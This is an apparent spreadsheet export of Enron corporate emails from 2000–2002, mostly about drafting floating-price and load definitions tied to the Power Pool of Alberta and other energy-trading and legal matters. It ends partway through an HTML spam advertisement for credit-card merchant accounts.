The actual hourly price of Electricity as published (in final, not forecast, form) by the Power Pool of Alberta in the table entitled "Actual/Forecast" reported for the applicable day in the column for "Actual Posted Pool Price" and in the row(s) for the applicable Determination/Calculation Period, on the Power Pool of Alberta internet web page currently located at www.powerpool.ab.ca/Market/Reports/ActualForecastReportServlet; provided that the Floating Price shall be corrected to reflect any "Pool Price Errors" as may be posted on such web page, or otherwise communicated, from time to time by the Power Pool of Alberta._x000D_
_x000D_
Therefore, I am very concerned with the redraft of this language.  Our preference is to retain the language as is currently in use, as we believe it is accurate and specific, works properly for physical and financial power transactions and has wide-spread acceptance in the Alberta Power market.  If there are specific nuances arising from the fact that we are dealing with a weather derivative tied to the Power Pool Index, I would prefer that they be addressed elsewhere in the confirmation rather than redrafting the standard Power Pool Index language._x000D_
_x000D_
_x000D_
Thanks_x000D_
Greg Johnston_x000D_
Senior Counsel_x000D_
Enron Canada Corp._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Seib, Dianne  _x000D_
Sent:	Thursday, October 18, 2001 9:03 AM_x000D_
To:	Johnston, Greg_x000D_
Subject:	FW: Power Demand w/ECC - EOL_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Khanna, Sanjeev  _x000D_
Sent:	Thursday, October 18, 2001 9:00 AM_x000D_
To:	Hendry, Brent; Kumar, Vivek; Anderson, Diane; Gil, Eduardo_x000D_
Cc:	Cisneros, Celeste; Seib, Dianne_x000D_
Subject:	RE: Power Demand w/ECC - EOL_x000D_
_x000D_
We need to add the definition of Load (how it is calculated). I have asked the Power Pool of Alberta to publish the definition and we put the same in our contract as well. _x000D_
_x000D_
Brent/Diane: I will send you the defintion as soon as I get it. I have made one but it needs to bve consistent with Power Pool of Alberta._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sanjeev_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hendry, Brent  _x000D_
Sent:	Thursday, October 18, 2001 9:46 AM_x000D_
To:	Kumar, Vivek; Anderson, Diane; Gil, Eduardo; Khanna, Sanjeev_x000D_
Cc:	Cisneros, Celeste; Seib, Dianne_x000D_
Subject:	RE: Power Demand w/ECC - EOL_x000D_
_x000D_
The changes are OK.  I would just make "Report" lower case and change the following word from "of" to "in"._x000D_
Thanks,_x000D_
Brent_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kumar, Vivek  _x000D_
Sent:	Thursday, October 18, 2001 8:24 AM_x000D_
To:	Anderson, Diane; Gil, Eduardo; Khanna, Sanjeev_x000D_
Cc:	Hendry, Brent; Cisneros, Celeste; Seib, Dianne_x000D_
Subject:	RE: Power Demand w/ECC - EOL_x000D_
Importance:	High_x000D_
_x000D_
Diane,_x000D_
_x000D_
Thanks for the correction to the content and the language. There are just a couple of minor edits that I would propose to the language below - these are highlighted._x000D_
_x000D_
The Floating Amount shall be the arithmetic average of the hourly Alberta Power Pool loads for all hours on each Delivery Day during the Calculation Period.  The  Floating Amount shall be calculated by taking the arithmetic average of the "Average" daily "Pool Demand (MW)" for each Delivery Day during the Calculation Period set forth in the "Power Pool of Alberta Operations Report" for each relevant month found in the "Pool Monthly Summary" Report of the "Historical" "Reports" section published by the Alberta Power Pool on its official web site currently located at &lt;http://www.powerpool.ab.ca/&gt;, , or any successor thereto. The transaction is for the average of hourly pool demands on each Delivery Day beginning with the hour ending 0100 (12:00 am) and concluding with the hour ending 2400 (12:00 am).  "Delivery Day" means each day during the Calculation P eriod_x000D_
_x000D_
Thanks,_x000D_
Vivek_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Anderson, Diane  _x000D_
Sent:	Wednesday, October 17, 2001 2:29 PM_x000D_
To:	Gil, Eduardo; Kumar, Vivek; Khanna, Sanjeev_x000D_
Cc:	Hendry, Brent; Cisneros, Celeste; Seib, Dianne_x000D_
Subject:	RE: Power Demand w/ECC - EOL_x000D_
_x000D_
All,  _x000D_
_x000D_
Please take a look at the attached language proposed for the Floating Rate for the EOL  Alberta Hourly deals with ECC.  The changes incorporate a more specific route to the referenced data:_x000D_
The Floating Amount shall be the arithmetic average of the hourly Alberta Power Pool loads for all hours on each Delivery Day during the Calculation Period.  The  Floating Amount shall be calculated by taking the arithmetic average of the "Average" daily "Pool Demand (MW)" for each Delivery Day during the Calculation Period set forth in the "Power Pool of Alberta Monthly Report" for each relevant month found in the "Pool Monthly Summary" page of the "Historical" "Reports" section published by the Alberta Power Pool on its official web site currently located at &lt;http://www.powerpool.ab.ca/&gt;, , or any successor thereto. The transaction is for the average of hourly pool demands on each Delivery Day beginning with the hour ending 0100 (12:00 am) and concluding with the hour ending 2400 (12:00 am).  "Delivery Day" means each day during the Calculation P eriod_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Please let me know if this accurately reflects the location of the data, and if you agree to use this language._x000D_
_x000D_
Thanks,_x000D_
Diane_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kumar, Vivek  _x000D_
Sent:	Monday, October 15, 2001 11:37 AM_x000D_
To:	Gil, Eduardo_x000D_
Cc:	Khanna, Sanjeev_x000D_
Subject:	FW: Power Demand w/ECC_x000D_
_x000D_
Eduardo,_x000D_
Here is how we get to the data as at this point in time (I don't know how changes in wesbites are handled):_x000D_
_x000D_
http:www.powerpool.ab.ca_x000D_
Click on 'Reports'_x000D_
Click on 'Historical'_x000D_
Scroll the box to 'Pool Monthly Summary' , choose the month, year, and click OK_x000D_
_x000D_
The title of the relevant page is :_x000D_
_x000D_
Power Pool of Alberta_x000D_
Operations Report for Month, Year_x000D_
_x000D_
Pls let me know if there are any questions._x000D_
Vivek_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Anderson, Diane  _x000D_
Sent:	Monday, October 15, 2001 11:29 AM_x000D_
To:	Gil, Eduardo_x000D_
Cc:	Kumar, Vivek_x000D_
Subject:	Power Demand w/ECC_x000D_
_x000D_
Eduardo,  _x000D_
_x000D_
I spoke with Brent Hendry regarding these deals and we need to have some clarification on the Floating Amount language.  Conceptually it is OK, but when you go to the website http://www.powerpool.ab.ca , there is no specific heading titled "Power Pool of Alberta Hourly Load Data" - unless we're just missing where on the website it is located.  Either way, if we're going to be specific, we need to give the exact location of the data, not just a generalized concept - if it is buried somewhere in one of the pages, we need to give adequate info in order to get to that page.  _x000D_
_x000D_
Please advise._x000D_
Thanks,_x000D_
Diane_x000D_
3.0443_x000D_
_x000D_
 _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 03:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TXU Fuels / SDS Nomination for March 2001</t>
  </si>
  <si>
    <t>Attached is the March 2001 nomination for our takes under the Gas Sales and_x000D_
Purchase Contract between TXU Fuel Company (previously TUFCO) and SDS.  Please_x000D_
advise should you have any questions concerning the attached._x000D_
_x000D_
Thanks,_x000D_
CCS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: SDSNOM.xls)_x000D_
_x000D_
 - SDSNOM.xls</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 14:46:48 -0800 (PST)</t>
  </si>
  <si>
    <t>API Report 1/29</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now in the most recent version of Adobe Acrobat 4.0 and they_x000D_
should print clearly from Adobe Acrobat Reader 3.0 or higher. Adobe Acrobat_x000D_
Reader 4.0 may be downloaded for FREE from www.adobe.com._x000D_
_x000D_
_x000D_
_x000D_
(See attached file: TotalGasolineStocks.pdf)(See attached file: Padd I_x000D_
Distillate Stocks.pdf)(See attached file: Padd I Gasoline Stocks.pdf)(See_x000D_
attached file: Padd II Crude Stocks.pdf)(See attached file:_x000D_
TotalCrudeStocks.pdf)(See attached file: TotalDistillateStocks.pdf)(See_x000D_
attached file: APIMAIL.pdf)_x000D_
 - TotalGasolineStocks.pdf _x000D_
 - Padd I Distillate Stocks.pdf _x000D_
 - Padd I Gasoline Stocks.pdf _x000D_
 - Padd II Crude Stocks.pdf _x000D_
 - TotalCrudeStocks.pdf _x000D_
 - TotalDistillateStocks.pdf _x000D_
 - APIMAIL.pdf </t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Univ of Texas</t>
  </si>
  <si>
    <t>Julia,_x000D_
_x000D_
The lawyers at UT at Austin have some questions regarding your corrections_x000D_
to the non-disclosure agreement._x000D_
_x000D_
Specifically, they want to discus the arbitration provision. The name of the _x000D_
lawyer at UT_x000D_
is Gene Bartley, 512 471 2995._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 23:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'earl.chanley@enron.com'})</t>
  </si>
  <si>
    <t>Re: EOG Pronghorn Location</t>
  </si>
  <si>
    <t>If we bare any expense, EOG is suppose to reimburse us, but getting money out _x000D_
of them is like pulling teeth.  _x000D_
_x000D_
I suggest we complete the work at the site and have our facilities ready to _x000D_
proceed when necessary.  Marketing is not in a position right now to pay the _x000D_
cost of the EFM.  Given that these volumes will flow under a "pooling _x000D_
agreement", there isn't any incremental revenue generated for TW._x000D_
_x000D_
We will get with EOG to request payment for the EFM before we proceed.  Any _x000D_
idea how much the EFM will cost?</t>
  </si>
  <si>
    <t>Mon, 26 Jul 1999 08:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Central Puerto S.A.</t>
  </si>
  <si>
    <t xml:space="preserve">The Trade Date should be July 23, 1999._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Larry Joe Hunter                           07/26/99 03:25 PM_x000D_
	_x000D_
_x000D_
To: Scott Neal/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Dale _x000D_
Neuner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Central Puerto S.A._x000D_
_x000D_
Scott/Sara/Dale,_x000D_
_x000D_
Does anyone disagree with the below (Trade Date should be July 23).  The _x000D_
confirm will go out immediately when you respond._x000D_
_x000D_
thanks,_x000D_
Joe_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Larry Joe Hunter/HOU/ECT on 07/26/99 _x000D_
03:24 PM ---------------------------_x000D_
_x000D_
_x000D_
Brent Hendry@ENRON_DEVELOPMENT_x000D_
07/26/99 03:11 PM_x000D_
To: Larry Joe Hunter/HOU/ECT@ECT_x000D_
cc: Dale Neuner/HOU/ECT@ECT, Sara Shackleton@ENRON_DEVELOPMENT, Scott _x000D_
Neal@ENRON_DEVELOPMENT, sneal@ect.enron.com _x000D_
Subject: Re: Central Puerto S.A.  _x000D_
_x000D_
Since Scott Neal's phone call with the counterparty was July 23 I believe _x000D_
that should be the correct date.  The call made by Julian and Federico on _x000D_
July 20 was not effective to bind ECT.  Please confirm this with Sara and _x000D_
Scott and make sure everyone is on board with this.  I am sure Scott was just _x000D_
using the draft deal ticket Julian prepared and Julian used the date they _x000D_
called rather than the date that Scott did the deal._x000D_
_x000D_
_x000D_
To: Brent Hendry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Dale Neuner/HOU/ECT@ECT _x000D_
Subject: Central Puerto S.A._x000D_
_x000D_
Brent,_x000D_
_x000D_
One last question on the Central Puerto S.A. doc.  We currently have the _x000D_
Trade Date as July 23, but the tickets we received say July 20th.  Is July _x000D_
20th correct?  _x000D_
_x000D_
Thanks,_x000D_
Joe_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 09:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAISO Notice - Posting of Additional Appendices to Support CMR Re_x000D_
 commendation</t>
  </si>
  <si>
    <t xml:space="preserve">  Market Participants:_x000D_
_x000D_
  The ISO has posted the following materials regarding CAISO's_x000D_
Congestion Management Reform (CMR) Recommendation._x000D_
_x000D_
  Congestion Management Reform Recommendation (This is the_x000D_
same as the version posted on July 11th with the exception that we have_x000D_
corrected typographical errors.)_x000D_
_x000D_
  Appendix A - Terminology and Acronyms A glossary of various_x000D_
terms and acronyms used throughout the CMR Recommendation package._x000D_
_x000D_
  Appendix B - Locational Price Dispersion Study Summarizes_x000D_
the areas of empirical study in which the ISO is currently engaged and_x000D_
describes the objective, design, and preliminary results of the ISO's_x000D_
analysis of the dispersion of locational prices throughout the ISO control_x000D_
area._x000D_
_x000D_
  Appendix D - Assessment of CMR Design Recommendation with_x000D_
Respect to Stakeholder Evaluation Criteria Compares the CMR Recommendation_x000D_
against the specific evaluation criteria agreed to by the ISO and Market_x000D_
Participants at the first stakeholder meetings._x000D_
_x000D_
  Appendix E - Congestion Management Redesign Options Not_x000D_
Adopted in the CMR Recommendation_x000D_
_x000D_
  Appendix G - System Impacts Summarizes the anticipated_x000D_
impact of CMR Recommendation on the ISO's primary systems, such as SI/SA,_x000D_
BBS, FTR, EMS, etc.  The purpose of this appendix is not to provide detailed_x000D_
cost-benefit evaluation of the proposal, which we believe would be entirely_x000D_
subjective and of little value._x000D_
_x000D_
  Appendix H - Intra-Zonal Congestion Management Mitigation_x000D_
Costs During 1999  and Their Application to Local Reliability Areas._x000D_
_x000D_
  It is our intent to publicly distribute Appendix C, as_x000D_
identified below, by mid August.  In the final draft of_x000D_
  the recommendation package, to be publicly distributed and_x000D_
provided to the Board in late August, we will_x000D_
  provide the following additional appendices as well as_x000D_
updated versions of those identified above._x000D_
_x000D_
  Appendix C - Market Separation Study The objectives, design,_x000D_
and preliminary results of the other ongoing study being undertaken in_x000D_
connection with the Congestion Management Reform process._x000D_
_x000D_
  Appendix F - Summary of Stakeholder Comments of California_x000D_
ISO Congestion Management Proposals A summary of all stakeholder comments_x000D_
received to date on the various proposals and concepts incorporated into_x000D_
this recommendation package._x000D_
_x000D_
  You can find these Appendices along with the original_x000D_
proposal and feedback form  at_x000D_
http://www.caiso.com/clientserv/congestionreform.html._x000D_
_x000D_
  Byron Woertz_x000D_
  Director, Client Relations</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 05:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Natural Gas Customers</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 06/26/2000 12:06 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Jason Moore_x000D_
06/26/2000 10:44 AM_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc: Joel Henenberg/NA/Enron@Enron, Mary G Gosnell/HOU/ECT@ECT _x000D_
Subject: Natural Gas Customers_x000D_
_x000D_
Attached please find a spreadsheet containing a list of natural gas customers _x000D_
in the Global Counterparty database.  These are all active counterparties, _x000D_
although we may not be doing any business with them currently.  If you have _x000D_
any questions, please feel free to call me at x33198._x000D_
_x000D_
_x000D_
_x000D_
Jason Moore_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 08:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>what are you doing tonight</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 01:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Swap Assignment Agreement - April 20 Draft</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff:_x000D_
Were the following points considered or discussed prior to them turning the _x000D_
last draft?  The cross default langugae still does not work.  Why was the _x000D_
threshold lowered to $50,000,000?_x000D_
_x000D_
Alicia:_x000D_
What are your thoughts on this?_x000D_
_x000D_
Carol _x000D_
---------------------- Forwarded by Carol St Clair/HOU/ECT on 05/08/2000 _x000D_
08:42 AM ---------------------------_x000D_
_x000D_
_x000D_
Carol St Clair_x000D_
04/28/2000 10:23 AM_x000D_
To: jeldredge@velaw.com_x000D_
cc: acurry@velaw.com _x000D_
Subject: Swap Assignment Agreement - April 20 Draft_x000D_
_x000D_
Jeff:_x000D_
Sorry this took so long but here are my thoughts on the above:_x000D_
_x000D_
1. In Section 3.1 (c), I'm assuming that the additional sections were added _x000D_
because we will get these reps in another agreement from the Trust.  Is that _x000D_
correct?_x000D_
_x000D_
2. In Section 3.4 e), the new language regarding rescission of acceleration I _x000D_
think belongs after the phrase that begins, "if the effect of such _x000D_
failure..."  Also, where did the new language regarding prepayments at the _x000D_
end come from?  Is this in the Revolver or in Enron's existing deals? _x000D_
_x000D_
3. Section 3.11 should be made subject to Section 5.7 or vice versa._x000D_
_x000D_
Carol_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TDS Desk Roll up</t>
  </si>
  <si>
    <t xml:space="preserve">I just wanted to confirm that the ability to create roll ups without the IT _x000D_
group's involvement has been moved up_x000D_
on the priority list._x000D_
_x000D_
Russ </t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 01:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron / HPL Actuals for January 30, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Teco Tap       18.750 / Enron_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 09:14:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>A quote from Massey</t>
  </si>
  <si>
    <t>Virtually everyone wants us to move forward, define some market rules, define some new tariff rules, so that a little guy, a trader in Arkansas that wants to trade in Maine, can do so easily without having to understand rules for 17 different RTOs. I think this is a banner week for RTO policy. I think we finally have political will for bold, decisive action. We've got a head of steam up. We're going to move quickly." - FERC Commissioner William Massey on RTO week._x000D_
_x000D_
Rick:  now will you quit picking on poor bill?</t>
  </si>
  <si>
    <t>frozenset({'ecthou_gt2@enron.com'})</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 01:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Legislation for NEWS: 6.5 cent bill passes Senate</t>
  </si>
  <si>
    <t xml:space="preserve">I found out late Friday that the bill passed out of the Senate on Thursday _x000D_
and went to the Assembly for a vote._x000D_
By putting a cap on all customers served by SDG&amp;E, the government is _x000D_
essentially putting customers of all three IOU's on the same footing, which _x000D_
allows for a common surcharge to be levied on all the customers.  The 6.5 _x000D_
cent ceiling is comparable to the frozen rates of SCE and PG&amp;E plus the 1cent _x000D_
surcharge levied in January._x000D_
_x000D_
Here's the analysis that is put out at the Senate..._x000D_
_x000D_
_x000D_
Here's the bill itself..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rosalinda Tijerina_x000D_
03/12/2001 09:41 AM_x000D_
To: Tamara Johnson/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: NEWS: 6.5 cent bill passes Senate_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rosalinda Tijerina/HOU/EES on 03/12/2001 _x000D_
09:41 AM ---------------------------_x000D_
From: Jeff Dasovich@ENRON on 03/10/2001 12:03 PM_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Alan Comnes/PDX/ECT@ECT, Angela Schwarz/HOU/EES@EES, Beverly _x000D_
Aden/HOU/EES@EES, Bill Votaw/HOU/EES@EES, Brenda Barreda/HOU/EES@EES, Carol _x000D_
Moffett/HOU/EES@EES, Cathy Corbin/HOU/EES@EES, Chris H Foster/HOU/ECT@ECT, _x000D_
Christina Liscano/HOU/EES@EES, Craig H Sutter/HOU/EES@EES, Dan _x000D_
Leff/HOU/EES@EES, Debora Whitehead/HOU/EES@EES, Dennis Benevides/HOU/EES@EES, _x000D_
Don Black/HOU/EES@EES, Dorothy Youngblood/HOU/ECT@ECT, Douglas _x000D_
Huth/HOU/EES@EES, Edward Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES, _x000D_
Erika Dupre/HOU/EES@EES, Evan Hughes/HOU/EES@EES, Fran Deltoro/HOU/EES@EES, _x000D_
Gayle W Muench/HOU/EES@EES, Ginger Dernehl/NA/Enron@ENRON, Gordon _x000D_
Savage/HOU/EES@EES, Harold G Buchanan/HOU/EES@EES, Harry _x000D_
Kingerski/NA/Enron@ENRON, Iris Waser/HOU/EES@EES, James D _x000D_
Steffes/NA/Enron@ENRON, James W Lewis/HOU/EES@EES, James Wright/Western _x000D_
Region/The Bentley Company@Exchange, Jeff Messina/HOU/EES@EES, Jeremy _x000D_
Blachman/HOU/EES@EES, Jess Hewitt/HOU/EES@EES, Joe Hartsoe/Corp/Enron@ENRON, _x000D_
Karen Denne/Corp/Enron@ENRON, Kathy Bass/HOU/EES@EES, Kathy _x000D_
Dodgen/HOU/EES@EES, Ken Gustafson/HOU/EES@EES, Kevin Hughes/HOU/EES@EES, _x000D_
Leasa Lopez/HOU/EES@EES, Leticia Botello/HOU/EES@EES, Mark S _x000D_
Muller/HOU/EES@EES, Marsha Suggs/HOU/EES@EES, Marty Sunde/HOU/EES@EES, _x000D_
Meredith M Eggleston/HOU/EES@EES, Michael Etringer/HOU/ECT@ECT, Michael _x000D_
Mann/HOU/EES@EES, Michelle D Cisneros/HOU/ECT@ECT, mpalmer@enron.com, Neil _x000D_
Bresnan/HOU/EES@EES, Neil Hong/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Paula _x000D_
Warren/HOU/EES@EES, Richard L Zdunkewicz/HOU/EES@EES, Richard _x000D_
Leibert/HOU/EES@EES, Richard Shapiro/NA/Enron@ENRON, Rita _x000D_
Hennessy/NA/Enron@ENRON, Roger Yang/SFO/EES@EES, Rosalinda _x000D_
Tijerina/HOU/EES@EES, Sandra McCubbin/NA/Enron@ENRON, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Scott Gahn/HOU/EES@EES, Scott Stoness/HOU/EES@EES, _x000D_
Sharon Dick/HOU/EES@EES, skean@enron.com, Tanya Leslie/HOU/EES@EES, Tasha _x000D_
Lair/HOU/EES@EES, Ted Murphy/HOU/ECT@ECT, Terri Greenlee/NA/Enron@ENRON, Tim _x000D_
Belden/HOU/ECT@ECT, Tony Spruiell/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, _x000D_
Vladimir Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, William S _x000D_
Bradford/HOU/ECT@ECT, Kathryn Corbally/Corp/Enron@ENRON, Jubran _x000D_
Whalan/HOU/EES@EES, triley@enron.com, Richard B Sanders/HOU/ECT@ECT, Robert C _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Greg Wolfe/HOU/ECT@ECT, James _x000D_
Wright/Western Region/The Bentley Company@Exchange, Dirk vanUlden/Western _x000D_
Region/The Bentley Company@Exchange, Steve Walker/SFO/EES@EES, Jennifer _x000D_
Rudolph/HOU/EES@EES, Martin Wenzel/SFO/HOU/EES@EES, Douglas _x000D_
Condon/SFO/EES@EES, wgang@enron.com, Scott Govenar &lt;sgovenar@govadv.com&gt;, _x000D_
Hedy Govenar &lt;hgovenar@govadv.com&gt; @ ENRON, jklauber@llgm.com, Mike D _x000D_
Smith/HOU/EES@EES, John Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Janel _x000D_
Guerrero/Corp/Enron@Enron, Eric Letke/DUB/EES@EES_x000D_
cc:  _x000D_
Subject: NEWS: 6.5 cent bill passes Senate_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 03/10/2001 12:09 PM -----_x000D_
_x000D_
	Jennifer Rudolph@EES_x000D_
	03/08/2001 03:31 PM_x000D_
		 _x000D_
		 To: CA Team_x000D_
		 cc: _x000D_
		 Subject: NEWS: 6.5 cent bill passes Senate_x000D_
_x000D_
_x000D_
* CA Senate passed SBX1 43 today_x000D_
* Now, the bill goes to the Assembly_x000D_
* Looking for article..._x000D_
* More to come_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 26 Aug 2000 05:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lorie.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>SEATS Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
Any luck  on finding the original Australian Exchange agreement?_x000D_
_x000D_
thanks,_x000D_
lorie </t>
  </si>
  <si>
    <t>Sun, 30 Dec 2001 21:58:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'krzybob@4vendor.net'})</t>
  </si>
  <si>
    <t>frozenset({'aster@amic.com'})</t>
  </si>
  <si>
    <t>Increase Sales.......</t>
  </si>
  <si>
    <t>&lt;HTML&gt;&lt;P ALIGN=CENTER&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=16&gt;Do you have a business?&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;If you do:_x000D_
You can accept-- Credit Cards Now!!!&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;You Can increase your sales &lt;BR&gt;_x000D_
1500%&lt;BR&gt;_x000D_
Overnight by accepting Major&lt;BR&gt;_x000D_
Credit Cards&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;I&gt;&lt;U&gt;Are you turning away your shares of over 375 million sales?&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/I&gt;&lt;/U&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;That's how many credit card-- transactions are being done nation wide!&lt;BR&gt;_x000D_
Charges in 1997 alone toppled $1 Trillion!&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;Regardless of your credit-- history...&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=11 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;You can accept &lt;/FONT&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=11 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;U&gt;Visa;Mastercard; Discover,Novus; and American Express!&lt;BR&gt;_x000D_
&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;_x000D_
&lt;/FONT&gt;&lt;/U&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;_x000D_
